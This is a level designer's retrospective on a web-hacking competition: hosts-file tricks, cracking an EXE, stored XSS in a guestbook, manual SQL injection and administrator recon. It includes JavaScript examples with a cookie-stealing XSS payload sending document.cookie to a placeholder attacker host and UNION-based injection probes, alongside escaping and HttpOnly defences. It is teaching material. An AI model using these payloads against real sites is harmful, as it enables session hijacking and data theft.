IT168 New Year security technology competition: a summary from the level designer


Author: emptiness

[IT168] Every technique used across the whole set of levels is fairly basic. As long as you have ideas of your own and understand fundamental hacking techniques, you can get through the competition with a little time. The overall design idea was this: require players to use their own real skills rather than fully automated tools, be familiar with basic web attack techniques, and be willing to think. The levels should be as realistic as possible, and no technique should be repeated if it can be avoided. At the very first level I expected the hosts file to block some people, so that the impatient ones who would not stop to think would cool off first and come back later.

The entrance to this competition is: http://www.ixpub.net/thread-892412-1-1.html

The purpose of this competition is first to keep the novices at the door, so that the more skilled people can collect the rewards and share their attack and defence experience. Once the novices have learned from that experience, they can apply it in later rounds. The most brilliant part of a hacking game is always how it is finally cracked.


In fact, a good challenge is sometimes very hard to come up with. It has to require real skill and it cannot be divorced from reality; that is the difficulty of level design. For example, if I set a meaningless question with an administrator password that has you running rainbow tables for a day or two, is that practical? We may well run into exactly that situation in daily life, but it wastes your time and the country's electricity without reflecting any real skill. So choosing the challenge is the most important and the hardest step. The levels I finally set are all quite selective.

Level 1: hosts file + simple cracking

Note that observation is a foundation every security person must have. It matters even more than many techniques, and it deserves thought; it is part of the game. Not one sentence in the author's game description is written idly; many of them hold keys, or even the "final pass". 7J (first place in the competition) took a big loss here. The original wording was: "After testing, every level address can be accessed normally." That looks like pure nonsense, but in disguise it is telling you: "The level is fine. If you cannot reach it, that is your problem. Do your best to reach it!" As a result, many sharp people thought of the hosts file.

After changing the hosts file, the page you reach lets you download an EXE to crack. Why add this? Again it is a disguised reminder: "See? These are all simple techniques. Even the prize-winning projects you usually see built into levels rest on the basics." Just look at a pediy tutorial, open OllyDbg (OD), search for all referenced strings, and the password is right there. That is what I call a "slightly basic" attack. Once you have the password, the address of Level 2 is displayed. It still cannot be reached directly, but after the big pitfall of Level 1 that is no longer a problem.

In everyday practice, I do not know whether you have thought about this: many servers have hidden sites on them. When we find that a site exists but cannot be reached, have you ever thought of modifying the hosts file? Perhaps the administrator was careless: the domain name expired, but the site is still sitting on the server. Modifying the hosts file can even defeat some forms of network-based licence verification.

Level 2: Breaking through the guestbook

Many websites have some kind of guestbook function, and if we know what to do with it there can be plenty to gain. As soon as they saw the guestbook, many friends knew the theme of this level: XSS. Generally speaking, a guestbook is a thin target, because it has so few functions. It is not impossible that some database files end in .asp, so you could write a one-line webshell into them, but in this game you should not even think about getting a shell: the stage environment is complicated and there are other sites on the server. I had to make sure you could not get a shell. And of course, I will not be giving that away next time either.

XSS has become an indispensable technique in attacks; in many cases it leads straight to a shell. So it is indispensable in the game too. But there are high-level and low-level variants. To look after everyone, I deliberately chose a guestbook with no XSS filtering at all (it will not be that easy next time). At the same time I set up a virtual machine on my own machine, and every morning and evening I logged in as the administrator to read the posts. Interaction; this is a standard interaction. Many XSS attempts succeeded, so their authors could see the change in the cookie once the administrator had logged on, and enter the address of Level 3.
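The guestbook attack just described, as an added example written for this page rather than the competition's own code: a minimal guestbook in JavaScript (Node.js) that stores posts unfiltered, exactly as the level did, rendered once by a vulnerable template and once by an escaping template, plus the cookie attribute that keeps the admin session out of document.cookie. The payload, the attacker.invalid collector address, the cookie name and the messages are all constructed for illustration.

```javascript
// Added example for this page, not code from the competition. It simulates a
// guestbook that stores visitor posts unfiltered (as the level did) and the
// administrator's page that renders them. Everything below is constructed.

// Placeholder collector address, not a real host.
const ATTACKER_HOST = 'http://attacker.invalid/collect';

// A typical cookie-stealing payload posted into the guestbook (constructed).
const XSS_PAYLOAD =
  "<script>new Image().src='" + ATTACKER_HOST +
  "?c=' + encodeURIComponent(document.cookie)</script>";

// The level's guestbook did no filtering at all, so storage is a plain push.
function storeMessage(book, author, body) {
  book.push({ author, body });
  return book;
}

// Vulnerable renderer: user input concatenated straight into HTML, so a stored
// <script> runs in the administrator's browser when the post is read.
function renderVulnerable(book) {
  return book.map(m => `<li><b>${m.author}</b>: ${m.body}</li>`).join('\n');
}

// Hardened renderer: every untrusted field is HTML-escaped on output.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, ch => map[ch]);
}
function renderSafe(book) {
  return book
    .map(m => `<li><b>${escapeHtml(m.author)}</b>: ${escapeHtml(m.body)}</li>`)
    .join('\n');
}

// Stand-in for a browser: does the rendered markup contain a live <script>
// element or an inline event handler? Enough to compare the two renderers.
const ACTIVE_SCRIPT_RE = /<script\b[^>]*>[\s\S]*?<\/script>|\son\w+\s*=/i;
function containsActiveScript(html) {
  return ACTIVE_SCRIPT_RE.test(html);
}

// Second line of defence: with HttpOnly the admin's session cookie is not
// readable from document.cookie even when a script does run.
function sessionCookieHeader(name, value) {
  return `${name}=${value}; Path=/; SameSite=Lax; HttpOnly`;
}

// Walk through the level: one ordinary post, one payload, then the admin reads.
function demo() {
  const book = [];
  storeMessage(book, 'visitor', 'Nice level!');
  storeMessage(book, 'attacker', XSS_PAYLOAD);
  return {
    vulnerableRendersScript: containsActiveScript(renderVulnerable(book)),
    safeRendersScript: containsActiveScript(renderSafe(book)),
    cookieHeader: sessionCookieHeader('ASPSESSIONID', 'constructed-session-id'),
  };
}

console.log(demo());
```

Output escaping is what removes the bug; the HttpOnly attribute only limits what a successful script can steal, and the crude regex check stands in for a browser only to make the two renderers comparable offline.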

Bear in mind that to keep the level running I had to come online every morning and evening to play my part, reading and deleting posts. To keep the function working, I wrote a special ASP page to restore the posts and the administrator password. That was a very long road. Only after this did the real game begin.

Level 3: manual SQL Injection

Q: How can I make sure that only manual injection works, and none of the current SQL injection tools?

This is the difference between humans and machines.

This is an unusual requirement, and there are no tutorials on the Internet for it. Everyone else is thinking about how to prevent SQL injection attacks, while I was thinking about how to defeat the tools' automated scanning while still allowing manual SQL injection.

In the end I settled on a method I call conversion. After receiving the characters entered by the user, the level parses the fields and converts the SQL injection keywords. A conversion list is provided for reference during manual injection. At first I did not provide the conversion function written in JavaScript. Later, seeing that the official prize was not as generous as expected, I worried that the difficulty was too high and would dampen enthusiasm for passing the level, so to look after everyone I specifically added a conversion function.

In fact, the difficulty is really not high. One statement obtains the path of the .mdb file, and another does a cross-database query. The table names and field names are the most common ones too.
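The conversion mechanism, as an added example in JavaScript written for this page. It is not the level's own conversion function, and the level's real conversion list was never published, so the keyword list, the coded tokens (@u for union, @s for select and so on) and the news query are constructed assumptions. What it shows is the ordering that makes the trick work: raw keywords, which a tool emits verbatim, are mangled first; coded tokens, which only someone reading the list knows, are translated afterwards, so the same query reaches the database intact only when a person built it by hand.

```javascript
// Added example for this page, not the level's own conversion function. The
// level's real conversion list is not published; the keyword list, the coded
// tokens and the query below are constructed stand-ins for the mechanism.

// Keywords an automated injection tool emits verbatim. Any of these in the raw
// input is mangled so the SQL the tool assembles is never valid.
const RAW_KEYWORDS = [
  'union', 'select', 'from', 'where', 'and', 'or', 'order', 'by',
  'insert', 'update', 'delete', 'exec', 'char',
];

// Coded tokens a human reads off the published list (constructed mapping).
const CONVERSION_TABLE = {
  '@u': 'union', '@s': 'select', '@f': 'from', '@w': 'where',
  '@a': 'and', '@o': 'or', '@ob': 'order by', '@c': 'char',
};

function escapeRegExp(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// Step 1: whole-word, case-insensitive mangling of raw keywords.
function mangleRawKeywords(input) {
  const re = new RegExp('\\b(' + RAW_KEYWORDS.join('|') + ')\\b', 'gi');
  return input.replace(re, m => '_' + m.toLowerCase() + '_');
}

// Step 2: translate coded tokens, longest first so "@ob" is not eaten by "@o".
function translateCodes(input) {
  const codes = Object.keys(CONVERSION_TABLE).sort((a, b) => b.length - a.length);
  const re = new RegExp('(' + codes.map(escapeRegExp).join('|') + ')', 'g');
  return input.replace(re, c => CONVERSION_TABLE[c]);
}

// Order matters: mangle first, translate second. Reversed, the translated
// keywords would be mangled too and nobody could inject.
function convertInput(userInput) {
  return translateCodes(mangleRawKeywords(userInput));
}

// The level's query stays deliberately concatenated; that is the bug players
// are meant to exploit by hand (constructed table and column names).
function buildQuery(rawId) {
  return 'SELECT title FROM news WHERE id=' + convertInput(rawId);
}

// A tool's probe versus the same probe written from the conversion list.
const TOOL_PROBE = '1 union select 1,2 from admin';
const HUMAN_PROBE = '1 @u @s 1,2 @f admin';
console.log(buildQuery(TOOL_PROBE));   // keywords mangled, the query is broken
console.log(buildQuery(HUMAN_PROBE));  // a valid union query reaches the database
```

This is a gating trick for a game, not a defence: the query is still concatenated, and the real fix for the level's own bug is a parameterized query, which is exactly why the level does not use one.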

SQL injection is the absolute king of web attacks; its appearance changed the era of attacks. I doubt SQL injection would have made it onto the urgent agenda of so many websites had it not been for the tools. But a novice who normally only uses tools, with no grounding in the underlying technique, will certainly get stuck at this level.

I had not originally planned to trip anyone up on injection; it is there only to remind everyone that there is another technique lurking in the dark.

Level 4: The Administrator

Q: What is the most important penetration point of an enterprise, whatever its size?

Without doubt it is the administrator. Even a secure system and a secure program cannot withstand the blunders of a careless administrator. They are the real "hackers".

An experienced penetration tester, an important level designer in the early days, once said that when building a site the most important thing is the administrator. Whatever route we take, the final finger points to him. In other words, if you have been on a site for half a day and still do not know who the administrator is, it only shows that you are a novice.

The first thing you see is the latest version of the forum software. To make sure you cannot get a shell, I disabled every functional page that involves FSO (FileSystemObject). I saw 7J talking about a "0-day" on the forum. Personally I think he was putting on a show, but that is just me: if there were a 0-day, it would not be burned on this level. I know this level inside out, and it is under absolute monitoring. The server was running Wireshark, so if you dared to throw an exploit at it I had a perfect recording. The person who threw a 0-day at j8hacker was caught by me, with the whole process captured perfectly.

Without a 0-day, there is obviously only one path: start with the administrator. I believe everyone has had the painful experience of guessing passwords. This password generally cannot be social-engineered, because I had no intention of letting social engineering work. So what is left at the end? After careful comparison, what is the difference between a brand-new forum install and this level? Is it not the administrator's mailbox?

This requires an extreme leap of associative (inertial) thinking. Judging from levels 1, 2 and 3, the level designer obviously has no money; being broke, he can only use the hosts file to build levels. The username part of the mailbox looks like one of those addresses. Is there no hidden clue in that? In fact, as soon as you bind that username as a domain name in the hosts file and access the level, you see the second sub-level of Level 4. The enterprise website that follows naturally yields a password. All of this hangs on the administrator's information: observe the administrator carefully and you will get plenty of useful things.

Use the password from sub-level 2 to go back to sub-level 1 of Level 4 and log in to the back end; that is the role of sub-level 2. What else can you do when every other function has been deleted? It is worth mentioning that this level differs from the previous ones: there is an obvious prompt on the pass-through page indicating that the back end is not complete. On this point I am very disappointed. I had already stated it so clearly in the pass instructions: "Please contact the administrator's QQ." Why did so many people get stuck at the door? Haha, this is actually a word game, done deliberately. -_-! Did you think the administrator's QQ was the default one that ships with the Dvbbs forum software?

Seeing that nobody was getting close, I played the good guy, going to the forum to post and keep reminding people. In past JavaScript-related hacking games everyone knew there would be "word games"; how could we forget that? Divergent thinking and lateral thinking are useful tools wherever they are applied.

In conclusion: have you mastered the techniques covered in this game? Good! Then wait for the next level!
